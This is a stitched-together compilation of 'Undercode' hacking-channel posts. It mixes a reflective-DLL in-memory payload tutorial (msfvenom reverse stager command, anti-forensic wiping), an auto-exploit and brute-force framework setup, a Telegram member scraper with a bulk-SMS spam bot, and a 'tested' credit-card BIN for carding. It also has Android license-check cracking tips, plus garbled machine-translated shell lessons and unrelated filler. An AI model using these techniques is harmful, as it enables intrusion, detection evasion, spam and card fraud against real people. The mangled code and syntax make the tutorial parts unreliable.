▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pazuzu: Reflective DLL to run binaries from memory- payload and hack system like expert
> Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

HOW AND WHY THIS SCRIPT :

The script Pazuzu.py accepts as input the binary you want to run from memory (parameter -f). Depending on the properties of the binary Pazuzu will choose one of the 3 DLL currently available. These DLL are:

1) reloc­x86.dll: lets you run the binary inside the address space of the process. This option is the most favorable since the binary generates less "noise" in the system.

2)dforking­x86.dll: the binary in this case also runs from memory but using "process hollowing". This technique is the one used by the "execute" command with the -m flag in Meterpreter.
download­86.dll: this is the noisiest option since the binary will be downloaded and executed from disk.

3) Pazuzu also provides some additional features. For example, the -x option will encrypt the section containing the binary by using a random RC4 key (which is stored in the DLL TimeStamp). In addition, after running it the PE header of the DLL and the binary section will be overwritten with zeros. I will add more anti-forensic techniques in future versions.

4) With the -p option the resulting DLL will be patched with the bootstrap required to reach the export ReflectiveLoader (more info in www.shelliscoming.com). This option is useful to not depend on the Metasploit handler to inject the DLL. That is, if the DLL is already patched we can upload it to a Web server so that the stager could retrieve it from there (more anonymity).

🦑 HOW TO RUN :

1) git clone https://github.com/BorjaMerino/Pazuzu

2) cd Pazuzu

3) run as python

4) To get the Pazuzu DLL I will use a WinHTTP stager:

> root@kali:~# msfvenom -p windows/dllinject/reverse_winhttp lhost=192.168.1.44 lport=8080 dll=. -f exe -o Winhttp-stager.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload

> No Arch selected, selecting Arch: x86 from the payload

> No encoder or badchars specified, outputting raw payload
Payload size: 908 bytes
Saved as: Winhttp-stager.exe

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SHELL PROGRAMMING FULL BY UNDERCODE :
instagram.com/UndercodeTesting
Shell programming

1) In DOS, you may be engaged in some routine repetitive tasks. At this time, you will write these repetitive commands as a batch file, as long as the batch file is executed Execute these commands. You will ask if there is batch processing in UNIX. The answer is yes. In UNIX, not only batch processing like DOS, its functions are more powerful than DOS, and it is relatively more complicated. It is already comparable to general high-level languages. In UNIX, everyone is not called a batch file, but called Shell Script.

2) In general, the status of Shell Script is exactly the same as other executable files (or commands), except that Shell Script is stored as a text file, not a binary file. When executing Shell Script, there must be a program that converts its contents into a series of commands to execute, and this program is actually Shell, which is why we are called Shell Script (hereafter we call it Script). The scripts of different shells will basically have some differences, so we can't execute the scripts written to the A shell with the B shell. In UNIX, we most commonly use Bourne Shell and C Shell, so this class introduces the writing of these two scripts.

🦑 Set the text file as executable Shell Script

If we have written the script, how to set it as an executable file? Because Script is actually an executable file, its access rights must be set to executable. We can use the following commands to change the access rights:
chmod u + x filename can only be executed by others,
chmod ug + x filename can only be executed by yourself and the same group, others cannot be executed by
chmod + x filename

🦑 And how do we specify which shell to use to explain the written script? Several basic designation methods are as follows:

!) If the first non-blank character of the script is not "" # "", it will use the Bourne Shell.

2) If the first non-blank character of Script is "" # "", but does not start with "" #! "", Then it will use the C Shell.

4) If the Script starts with "" #! "", Then what is written after "" #! "" Is the Shell used, and the entire path name should be pointed out.

🦑 It is recommended to use the third way to specify the Shell to ensure that what is executed is what you want. The path name of the Bourne Shell is / bin / sh, and the C Shell is / bin / csh.


1) Use Bourne Shell
┌ —————————— ┐ ┌ —————————— ┐
│echo enter filename │ │ ##! / Bin / sh │
│. │ or │. │
│ . │ │. │
│. │ │. │
└ —————————— ┘ └ —————————— ┘

2) Use C Shell
┌ ———————————— —┐ ┌ —————————— ┐
│ # C Shell Script │ │ #! / Bin / csh │
│. │ │. │
│. │ │. │
│. │ │.



┌ —————————— ┐
│ #! / Etc / perl │
│. │
│. │
│. │
└ —————————— ┘Except

for specifying the shell used in the script In addition, you can also force it in the command line. For example, if you want to use the C Shell to execute a script, you can issue this command:
csh filename

The access right of the script at this time does not have to be an executable file, and the shell specified inside will also be invalid. Will discuss.

□ Script's basic structure and concept

Script is a unit of behavior, and the script we write will be broken down into lines and executed. Each line can be a command, a comment, or a flow control instruction. If a line has not been completed, you can add "" "at the end of the line. At this time, the content of the next line will be received after this line and become the same line, as follows

┌ ———————————— ┐
│ echo The message is │
│too long so we have │
│to split it into │
│several lines │
└ ———————————— ┘When

"" # "" appears in the Script, then the The same line of text is a comment, Shell will not translate it.

🦑 The way to execute a command in Script is the same as in the command line. You can execute it in the foreground or background. You also need to set some environmental variables when executing the command.

The flow control of Script is no different from the flow control of general high-level languages. It also has subroutines like high-level languages. These make Script more powerful.

In order to achieve the same effect as high-level languages, we can also set variables in Script, which makes Script a veritable high-level language.

□ Bourne Shell

1- Variables

The variable types of Bourne Shell are only string variables, so to use numerical operations, you must rely on external commands to achieve your goals. And it kind of variables are the following:

1) User variables

This is the most frequently used variables, we can not contain any whitespace string to as variable names. When setting the variable value, use the following method:
var = string When

accessing the variable, add a "" $ "" sign in front of the variable name.


┌ ———————— ┐
│name = Tom │
│echo name │
│echo $ name │
└ ——————— ┘ The
result is as follows:
name
undercode

2) System variables (environment variables) are

similar to user variables , But this variable will pass its value to the command it executes. To set a user variable as a system variable, just add:
export var

┌ ——————— ┐
│name =undercode │
│export name │
└ ———————— ┘The

following is a user one The system variables that have been set after entering the system:
$ HOME The user's own directory
$ PATH The directory searched when the command is executed
$ TZ Time zone
$ MAILCHECK Check every second for new letters
$ PS1 Prompt number at the command line
$ PS2 When the command has not been finished, Shell Tip number when required and then enter the
search path $ MANPATH man instructions

3) read-only user variables

and user variables similar, but these variables can not be changed. To set user variables to read-only, just add:
readonly var

and if readonly is used, all read-only variables will be listed. Another point is that system variables cannot be set to read-only.

┌ ———————— ┐
│name = Tom │
│readonly name │
│echo $ name │
│name = John │
│readonly │
└ ———————— ┘The

result is as follows:
undercode
name: is read only
readonly name
Readonly ......

4)specific variables

some variables are set will start the implementation of Script, and not to be amended, but we do not call it a read-only system variables, and call it a special variable (some books It will be called a read-only system variable), because these variables are present when the program is executed, and users cannot set general system variables to be read-only. The following are some equivalent variables:
$ 0 The execution name of
this program $ n The nth parameter value of this program, n = 1..9
$ * All parameters of
this program $ # Number of parameters of this program
$$ PID of this program
$! Run on the previous background command PID
$? return value to execute a command

🦑 when the number of parameters when you run this program when more than nine, we can use the shift command parameters will move forward one space, so you can use the first 10 after the argument. In addition, we can use the set command to change $ n and $ *, as follows:
set string

so the value of $ * is string, and it will be put into $ n after decomposition. If there is no parameter after the set command, all the set variables and their values ​​will be listed.

File name: ex1 Parameters: this is a test

┌ ——————————— ┐
│echo Filename: $ 0 │
│echo Arguments: $ * │
│echo No. of args .: $ # │
│echo 2nd arg .: $ 2 │
│shift │
│echo No. of args .: $ # │
│echo 2nd arg .: $ 2 │
│set hello, everyone │
│echo Arguments: $ * │
│echo 2nd arg .: $ 2 │
└— —————————— ┘
The results are as follows:
Filename: ex1
Arguments: this is a test
No. of args .: 4
2nd arg .: is
No. of args .: 3
2nd arg .: a
Arguments: hello, everyone
2nd arg .: everyone is

worth mentioning Yes, when you want to input a variable value from the keyboard, you can use the following command:
read var1 var2 .....

At this time read will divide a word into a variable. If you enter more words than variables, the last variable will use the remaining words as its value. If you enter fewer words than variables, the following variables will be set to empty strings. If you need to deal with numerical operations, we can use the expr command. Its parameters and output are listed in Appendix A.

🦑 Second, Run

There are five methods Bourne Shell execute a command, whereas if the generated five manner slightly different.

1)Direct command
This command mode and effect column as direct command.

2) Use sh command
sh command
This file must be Bourne Shell Script, but this file does not have to be set to be executable. Otherwise, it's the same as direct command.

3) Use the "". "" Command
. Command

At this time, it is similar to using the sh command, except that it does not generally generate a new process like sh. On the contrary, it will complete the work under the original process.

4) Use the exec command
exec command.
This script will be replaced by the executed command. When this command is executed, the script will also end.

5) Replace command
This is a very useful method. If you want to make the output of a command a parameter of another command, you must use this method. We list the command between the two "" "" "signs, and Shell will replace the command and the two" "" "" symbols with the output of this command.

str = '' Current directory is '' '' pwd``
echo $ str
results are as follows:
Current directory is / users / cc / mgtsai
this means pwd this command outputs "" / users / cc / mgtsai "", and then the whole word The string replaces the original `` pwd`` to set the str variable, so the content of the str variable will be output by the pwd command.

number = `` expr $ number + 1''This
is the method mentioned above for numerical operations. Basically, the expr command only solves the expression, and then outputs it to standard output. If you want to set a variable to its value, you have to rely on command replacement. In this example, add 1 to the value of the number variable and then save it back to the number variable.

3) Process control

Before introducing flow control, let's take a look at the test command. The parameters of the test command are conditional judgments. When the condition is true, a non-zero value is returned, and when the condition is false, zero is returned. In all flow control, the test command must be used to judge the authenticity. The method of using the test command is listed in Appendix B.

test $ # = 0

If there are no parameters to execute this program, a non-zero value will be returned to represent "" $ # = 0 "". Otherwise, it returns zero.

🦑The following describes various flow control:

1) if then syntax and flow chart are as follows│

FALSE
if (condition) ＜ condition ＞ —┐
then │TRUE │
then-commands then-commands │
fi ├ ———— ┘
│


condition is a test command. The conditions in the various processes introduced later are test commands.
File name: chkarg

┌ ———————————— ┐
│if (test $ #! = 0) │
│ then │
│ echo Arg1: $ 1 │
│fi │
└ ————————— ——┘
$ chkarg Hello
Arg1: Hello
$ chkarg
$

2) if then else syntax and flow chart are as follows│

FALSE
if (condition) ＜ condition ＞ —————— ┐
then │TRUE │
then-commands then-commands else-commands
else ├ ———————— ┘
else-commands │
fi

3) if then elif syntax and process The picture is as follows│

FALSE
if (condition1) ＜ condition1 ＞ —┐
then │TRUE │ FALSE
commands1 commands1 ＜ condition2 ＞ —┐
elif (condition2) │ │ TRUE │
then │ commands2 commands3
commands2 ├ —————— ┴ ———— ┘
else │
commands3

commands3
fi

echo '' word 1: c ''
read word1
echo '' word 2: c ''
read word2
echo '' word 3: c ''
read word3
if (test "" $ word1 "" = "" $ word2 "" -a ""$ word2" "=" "$ word3" ")
then
For in syntax and flow chart are as follows│ FALSE for var in arg-list ┌— <arg-list Is there anything else? ＞ —┐ do │ │TRUE │ commands │ Get an item from arg- list│ done │ put in variable var │ │ │ │ │ commands │ └ —————— ┘ │ ┌ —————————— ——┐ ┌ —————— ┘ │for a in xx yy zz │ │ │ do │ │ echo $ a │ │done │


🦑 └ ———————————— ┘ The
result is as follows:
xx
yy

yy
zz

5) The syntax and flow chart of for are as follows│

FALSE
for var ┌— <Is there anything in the parameter? ＞ —┐
do │ │TRUE │
commands │ Get one item from the parameters │
done │ put in the variable var │
│ │ │
│ commands │
└ ————— ┘
│File name: lstarg ┌ —————— ┘
┌ ——————————— ┐ │
│for a │
│ do │
│ echo $ a │
│done │
└ ——————————— ┘
$ lstarg xx yy zz
xx
yy

yy
zz

6) The syntax and flow chart of while are as follows│


FALSE
while (condition) ┌— ＜ condition ＞ —┐
do │ │TRUE │
commands │ commands │
done └ ———— ┘ │
┌ ———— ┘
│

┌ ———————————————— ┐
│number = 0 │
│while (test $ number -lt 10) │
│ do │
│ echo "" $ numberc "" │
│ number = `` expr $ number + 1`` │
│done │
│echo │
└ ———————————————— ┘ The
result is as follows:
0123456789

7) The syntax and flow chart of until is as follows│


TRUE
until (condition) ┌ - <for condition condition> -┐
do │FALSE │ │
Commands Commands │ │
DONE ---- └ ┘ │
┌ ┘ ----
│

it and while only difference is that while the condition is true when performing loop, and until The loop is executed when the condition is false.

8)
Both break and continue are used for for, while, until and other loop control. break will jump to done after done, while continue will jump to done and continue to execute the loop.

9) The case syntax and flow chart are as

follows│ TRUE
case str in <str = pat1> ———— commands1—┐
pat1) commands1 ;; │FALSE TRUE │
pat2) commands2 ;; ＜ str = pat2 ＞ ———— commands2—┤
pat3) commands3 ;; │FALSE TRUE │
esac ＜ str = pat3 ＞ ———— commands3—┤
│FALSE │
├ ------------ ┘
│

and pat addition can specify certain string, the string may be set to specify, as follows
* arbitrary string
? arbitrary characters
[abc] a, b , one of the three characters or c wherein
[an] a to any one of n characters
| multi selector

┌ ┐ ---------------
│echo '' the Enter a, B, or C: c '' │
│read letter │
│case $ letter in │
│ A | a) echo '' You entered A. '' ;; │
│ B | b) echo '' You entered B. '' ;; │
│ C | c) echo '' You entered C. '' ;; │
│ *) echo '' Not A, B, or C '' ;;│
│esac │
└ ————————

Written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FASTEST WAY TO LEARN - + SOME TRICK TO SPEED UP
> SHELL PROGRAMMING FULL BY UNDERCODE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Updated popular tool for Network and Web Pentest Automation Framework :-INCLUDE CVE-
for any linux
instagram.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

FEATURES :

1) Network Infrastructure Security Assessment

2) Many supported Services: Target most common TCP/UDP services (HTTP, FTP, SSH, SMB, Oracle, MS-SQL, MySQL, PostgreSQL, VNC, etc.).

3) Combine Power of Tools: Each security check is performed by a tool from the toolbox. Attacks are performed by chaining security checks.

4) Context Awareness: Security checks to run are selected and adapted according to the context of the target (i.e. detected technologies, credentials, vulnerabilities, etc.).

5) Reconnaissance: Automatic fingerprinting (product detection) of targeted services is performed.

6) CVE Lookup: When product names and their versions are detected, a vulnerability lookup is performed on online CVE databases (using Vulners & CVE Details).

7) Vulnerability Scanning: Automatically check for common vulnerabilities and attempt to perform some exploitations (auto-pwn).

8) Brute-force Attack: Automatically check for default/common credentials on the service and perform dictionnary attack if necessary.

9) Wordlists are optimized according to the targeted services.

10) Post-authentication Testing: Automatically perform some post-exploitation checks when valid credentials have been found.
🦑 Web Security Assessment

1) Large Focus on HTTP: More than 60 different security checks targeting HTTP supported for now.
2) Web Technologies Detection: Fingerprinting engine based on

🦑 Wappalyzer is run prior to security checks, allowing to detect: Programming language, Framework, JS library, CMS, Web & Application Server.
1) Server Exploitation: Automatically scan and/or exploit most critical vulnerabilities (e.g. RCE) on web and application servers (e.g. JBoss, Tomcat, Weblogic, Websphere, Jenkins, etc.).

2) CMS Vulnerability Scanning: Automatically run vulnerability scanners on most common CMS (Wordpress, Drupal, Joomla, etc.).

🦑 Local Database & Reporting

3) Local Database: Data related to targets is organized by missions (workspaces) into a local Sqlite database that is kept updated during security testings.

4) Metasploit-like Interactive Shell: Access the database through an interactive shell with several built-in commands.

5) Import Targets from Nmap: Add targets to a mission either manually or by loading Nmap results.

6) Import Targets from Shodan: Add targets to a mission manually from shodan (need shodan API key).

7) Access all Results: All outputs from security checks, detected credentials and vulnerabilities are stored into the database and can be accessed easily.

8) Reporting: Generate full HTML reports with targets summary, web screenshots and all results from security testing.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

Pull Jok3r Docker Image:

1) git clone https://github.com/koutto/jok3r

2) jok3r

3) sudo docker pull koutto/jok3r

🦑 Run fresh Docker container:

1) sudo docker run -i -t --name jok3r-container -w /root/jok3r -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix --shm-size 2g --net=host koutto/jok3r
Notes:

-e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix is required in order to be able to start GUI applicationfrom the Docker container (e.g. open web browser to read reports). It requires running xhost +local:root on the host.
--shm-size 2g is used to increase the size of the shared memory, it is required to avoid crashs of web browser when reading reports from the Docker container.
--net=host is required to share host's interface. It is needed for reverse connections (e.g. Ping to container when testing for RCE, Getting a reverse shell)

2) To re-run a stopped container:

sudo docker start -i jok3r-container

3) To open multiple shells inside the container:

sudo docker exec -it jok3r-container bash

🦑COMMANDS :

python3 jok3r.py toolbox --show-all
Install all the tools in the toolbox (already done in Docker container):
python3 jok3r.py toolbox --install-all --auto
Update all the tools in the toolbox and prompt each time to check update:
python3 jok3r.py toolbox --update-all
Update all the tools in the toolbox without any prompt:
python3 jok3r.py toolbox --update-all --auto
Information
List supported services:
python3 jok3r.py info --services
Show security checks for a given service:
python3 jok3r.py info --checks <service>
Show supported attack profiles for a given service:
python3 jok3r.py info --attack-profiles <service>
Show supported products for all services:
python3 jok3r.py info --products

🦑Tested by Undercode
enjoy

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Network filtering-set up IP and MAC binding on Linux routing by undercode :
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

There are such requirements in some systems. IP addresses are connected to the Internet, and hope that these
IP addresses are not stolen by illegal users. This can be achieved by the following solutions:

1) First use ipchains or iptables to set only allow legitimate IP addresses to connect.
Establish IP / MAC bundling for legitimate IP. To discuss this issue, we first need to understand the working principle of the
ARP protocol . The ARP protocol is the abbreviation of the Address Resolution Protocol. Its function and working principle are as follows:
In the underlying network communication, two nodes want to communicate with each other. You must first know the MAC addresses of the source and destination. In order

2) to allow the system to quickly find the MAC address of a remote node, each local kernel maintains an immediate
lookup table (called ARP cache). ARP contains a list that maps the IP address of the remote host to its corresponding MAC address. The
Address Resolution Protocol (ARP) cache is a data structure that is resident in memory, and its contents are managed
and maintained by the kernel of the local system .

3) By default, the IP
address (and corresponding MAC address) of the node that the local system communicates with in the last ten minutes is retained in the ARP cache .

4) When the MAC address of a remote host exists in the ARP cache of the local host, there is no problem in converting the IP address of the remote node to the MAC
address. However, in many cases, the MAC address of the remote host does not exist in the local ARP cache,

5) What will the system do? When the IP address of a remote host is known, but the MAC address is not in the local ARP cache
, the following process is used to obtain the MAC address of the remote node: the

6) local host sends a broadcast packet to all nodes in the network, asking if There is a corresponding IP address. A node
(only one) will answer this ARP broadcast message. The MAC
address of the remote host will be included in the response packet . After receiving this return packet, the local node will record the MAC address of the remote node in the local ARP cache.

7) If we IP / MAC correspondence between the establishment of a fixed, that is, to establish a static MAC to those legitimate IP address of
the time should be the relationship, even if illegal users from stealing the IP address, connection linux router in response to these IP requests made

8) not Will query its MAC address through the ARP protocol, but use the static MAC address established by linux to send out the response data. In this way,

9) IP thieves will not get the response data, so they can not use network services.

10) The method of establishing static IP / MAC binding is to create / etc / ethers file, which contains the correct IP / MAC correspondence
, the format is as follows:
192.168.2.32 08: 00: 4E: B0: 24: 47
and then in / etc / The last addition of rc.d / rc.local:
arp -f
can be

11) The iptables of 2.4 kernel can limit IP and MAC at the same time, use this function to limit the
IP address and MAC address at the same time to the rules of legal IP .

---
end
?
WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 updated telegram group scraper tool. fetch all information about group members
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) pkg install -y git python

2) $ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git

3) $ cd TeleGram-Scraper

🦑 Install requierments

1) $ python3 setup.py -i

2) setup configration file ( apiID, apiHASH )
$ python3 setup.py -c

🦑 To Genrate User Data

1) $ python3 scraper.py

( members.csv is default if you changed name use it )

2) Send Bulk sms To Collected Data
$ python3 smsbot.py members.csv

3) Update Tool
$ python3 setup.py -u

🦑Tested by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Shell programming example-a simple directory menu
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> until
echo List Directory..........1
echo Change Directory........2
echo Edit File...............3
echo Remove File.............4
echo Exit Menu...............5

read choice
test $choice = 5
do
case $choice in

1) ls;;

2) echo Enter target directory
read dir
cd $dir
;;

3) echo Enter file name
read file
vi $file
;;

4) echo Enter file name
read file
rm $file
;;
q|Q|5) echo Goodbye;;
*) echo illegal Option
esac

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tested SCRIBD BINS :
530795x6xxx34xx0
FECHA: RND
CVV:RND
IP: USA
use for learn not for steal
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 best twitter bots :
twitter.com/undercodeNews :

1) @HundredZeros
Amazon has probably the biggest collection of eBooks. But if you’re looking for some really good eBooks, they’ll probably be paid, right? Not really, at least according to HundredZeros, which is a Twitterbot that regularly tweets links to the eBooks that are free on Amazon. This is a good example of a Twitter Bot which helps its followers. If you are an avid book reader, this is going to be one of the best Twitter Bots that you can follow.

2) @DearAssistant
Virtual assistants like Cortana, Siri, and Google Assistant Now are super cool in our smartphones, but if you want some of that help on Twitter? No problem, as DearAssistant is there to help. Ask just about any question, and it will tweet a pretty detailed response quickly. You can ask queries like distance between two places, definition of specific terms, and things like that.

3)@WhatTheFare
Uber has revolutionized the way we book rides for commuting between different places. And if you quickly want to find out the Uber fare between two points, simply send a tweet to WhatTheFare, and the Twitterbot will tweet back with the estimated Uber fare between the specified pick-up and drop-off locations. All Uber cities are supported.

4) @wayback_exe
Ever wanted to know what came before the fancy websites and ultra-modern web browsers of the present? You need to follow wayback_exe, which is an amazing Twitterbot that generates screenshots of old websites in old browsers, and tweets them every two hours. It utilizes data from the Wayback Machine digital archive to do so.


5) @dscovr_epic
Although the entire space is incredibly amazing and beautiful, our Earth can be considered special, for its our true home. And what better way to start (or end) the day, than seeing that home from space? Follow the dscovr_epic bot, which tweets random images of the Earth, as captured by NASA’s DSCOVR satellite, complete with the time and location over which they are taken. The images are breathtaking. This is one of my most favorite Twitter Bots.

6) @MagicRealismBot
Magic realism argues the acceptance of magic, as well as its importance in the real world. And if that’s something you find quite funny, you are going to have a fun time reading the tweets made by the MagicRealismBot, which takes random practices or tasks, and over exaggerates them with some sort of magic. It might not seem that way, but it’s really funny.

7) @MuseumBot
Who doesn’t like museums? They are fascinating places, depicting the amazing relics of our past, encompassing everything from art to history. This is why the MuseumBot is one Twitterbot that’s absolutely worth following. It tweets a random, high-resolution image from the Metropolitan Museum of Art, four times a day.

8) @TwoHeadlines
Headlines are essential for keeping ourselves updated with the latest happenings around the world. But what happens when you take two completely unrelated headlines, and randomly mash them together? To find out, simply follow TwoHeadlines, which mixes headlines about two different topics and tweets the result. You’ll have a hard time keeping yourself from bursting with laughter.

9) @pentametron
If you have a fascination with poetry, especially the works of the great William Shakespeare, pentametron is a no brainer. While the Twitterbot does not exactly post tweets, it searches tweets that have been written using the Iambic pentameter metric line, and then re-tweets them one after the another. Sounds confusing? Well if you understand poetry and the nuances of English, it’s amazing.

> Best twitter bots


10) @EarthquakeBot
Earthquakes happen all around the world, and cause major destruction to life and property. And while natural disasters are beyond anyone’s control, knowing about them in a timely manner can help. The EarthquakeBot is programmed to tweet any earthquakes that measure 5.0 or more on the Richter Scale, as they happen. Extremely useful, but this is one bot we’d want to stay as inactive as possible.

11) @_grammar_
Don’t know about you guys, but as a self-proclaimed Grammar Nazi, this is my favorite Twitterbot. And if the name Grammar Police isn’t still doesn’t explain everything, _grammar_ detects tweets that have improper usage of grammar, and then posts solutions. This one is a must for today’s social network addicted generation.

12) @MoMARobot
MoMA Bot is one of my favorite Twitter Bots on this list. If you are someone who is interested in modern art, you will appreciate this bot. The bot basically tweets a random object from the collection of the Museum of Modern Art four times a day. The best part is that the tweet comes with the link of the object on the Museum of Modern Art’s website, allowing you to check further information on the objects if you want to.

13) @netflix_bot
Want to keep yourself updated with the latest and greatest stuff coming up on Netflix? Follow netflix_bot, which tweets new releases on Netflix Instant as they happen. Perfect for all your binge watching needs.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Android Android crack reverse analysis SO commonly used IDA analysis skills by UNDERCODE :
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Creation and import of structure, structure pointer, etc.
Take JniNativeInterface, DexHeader as an example.
The function of parsing Dex is as follows:

After F5:

File-> load file-> parser c header file, import Dex.h
In the picture above, right-click a1, turn it into a structure, and select dexheader.


2)Adjust the number of parameters in the function pointer, indefinite parameters, etc.
Take __android_log_print as an example, select this function.

Edit-> operand type-> set operand type, modify the parameters as follows:
int (__cdecl *) (int, char *, char *, char *, int *, int *), after F5 refresh, the effect is as follows:



3) Conversion of thumb / arm mode
Shortcut key ALT + G, where 0x01 is THUMB and 0x00 is ARM mode. Generally 4 bytes ARM mode, two bytes are THUMB mode, such as:


4) The function is mistaken for a chunk, resulting in multiple entries for the caller function.
Taking Java_by_Ericky_crackme01_JNI_EatRice as an example, you can see that there are two entrances.


The end position of the first entry is the BX jump instruction. It should be allowed to jump to the second entry to be correct .

All must first remove function tail,
Select, at the end, and then edit-> functions-> remove function tail, the effect:

Then change the jump instruction BL to Call, edit-> others-> force bl call, the effect


5) C ++ RTTI, class name recognition.
JNI_OnLoad

sub_A558 is the constructor.


You can get this function named 9ArtLoader,


6) Create a function and set the end address of the function.
F5, the effect is as follows:

Solution, press P, then F5. If P has no effect, you can select it and then press P.

7) Elf repair, memory dump the so and other files, and then modify the base address of the dump, File-> LoadFile-> binary file .
The dump command is:
dd if = / proc / 1935 / mem of = / sdcard / alimsc4 skip = 1578049536 ibs = 1 count = 3993600

8) Data replication and patch.
Select the data, then edit-> export data, then

9) Script, idc, IDAPython
http://magiclantern.wikia.com/wiki/IDAPython/intro
http://drops.wooyun.org/tips/11849
http://drops.wooyun.org/tips/12060

10) lsof view deleted files, cat gets deleted files from memory
root @ android: / # lsof | busybox grep com.sxiaoao.car3d3
system_se 523 system 298 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 44 /data/data/com.sxiaoao.car3d3/files/app_sdk103700_.jar (deleted)
com.sxiao 10370 u0_a65 48 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 49 /data/app/com.sxiaoao.car3d3-2.apk

10370 is the process number 44 is the fd of the open file. The fd file is mapped in / prop / pid / fd
Copy the file with the cat command
1 | root @ android: / # cat / proc / 10370 / fd / 44> /data/local/tmp/test.jar

11) arm instruction simulator

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New Android packing and cracking-statically modify so, commonly used cracking methods last tutorial by undercode PART 1
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Tool introduction
IDA6.5, for static analysis of so files

010 Editor, modify the hexadecimal code of the so file

Android Killer Android decompilation tool

2) Modify SO
The project is the key code of Android jni. You can use AndroidKiller to open the app, find the corresponding so library, and get the package name of the current program.

cn.com.location.hshelldemo

> Source code:

Java_cn_com_location_hshelldemo_MainActivity_stringFromJNI(
JNIEnv *env,
jobject /* this */) {
std::string hello = "Hello from C++";
int ret = getAuthInfo(10000);

if(ret == RET_OK)
{
LOGE(" !!!Check successfully\n");
} else
{

LOGE(" !!!Check failed\n");
}

if(ret != RET_OK)
{
LOGE(" =====Check successfully\n");
}
else
{

LOGE(" =====Check failed\n");
}
return env->NewStringUTF(hello.c_str());
}
so Use IDA to open, and then enter options | General;

3) Just click the function on the left and press Ctrl + F to enter java. Here is to find the jni interface;

🦑Example :

1) Click to find the interface, double-click to see the assembly source code, press F5 to find the C code (C is very important, not much understand assembly, C basically still learn):

2) jstring __fastcall Java_cn_com_location_hshelldemo_MainActivity_stringFromJNI(JNIEnv *env, jobject a2)
{
unsigned __int8 *bytes; // ST0C_4
jstring result; // r0
_jstring *v4; // [sp+8h] [bp-78h]
int v5; // [sp+58h] [bp-28h]
_JNIEnv *v6; // [sp+68h] [bp-18h]
std::allocator<char> v7; // [sp+6Ch] [bp-14h]
std::basic_string<char,std::char_traits<char>,std::allocator<char> > v8; // [sp+70h] [bp-10h]
int v9; // [sp+74h] [bp-Ch]

v6 = env;
std::allocator<char>::allocator(&v7);
std::string::string(&v8, "Hello from C++", &v7);
std::allocator<char>::~allocator(&v7);
v5 = getAuthInfo(10000);
if ( v5 == 10000 )
_android_log_print(6, "native-lib-jni", " !!!Check successfully\n");
else
_android_log_print(6, "native-lib-jni", " !!!Check failed\n");
if ( v5 != 10000 )
_android_log_print(6, "native-lib-jni", " =====Check failed\n");
else
_android_log_print(6, "native-lib-jni", " =====Check successfully\n");
bytes = (unsigned __int8 *)std::string::c_str(&v8);
v4 = _JNIEnv::NewStringUTF(v6, bytes);
std::string::~string(&v8);
result = (jstring)_stack_chk_guard;
if ( _stack_chk_guard == v9 )
result = v4;
return result;
}

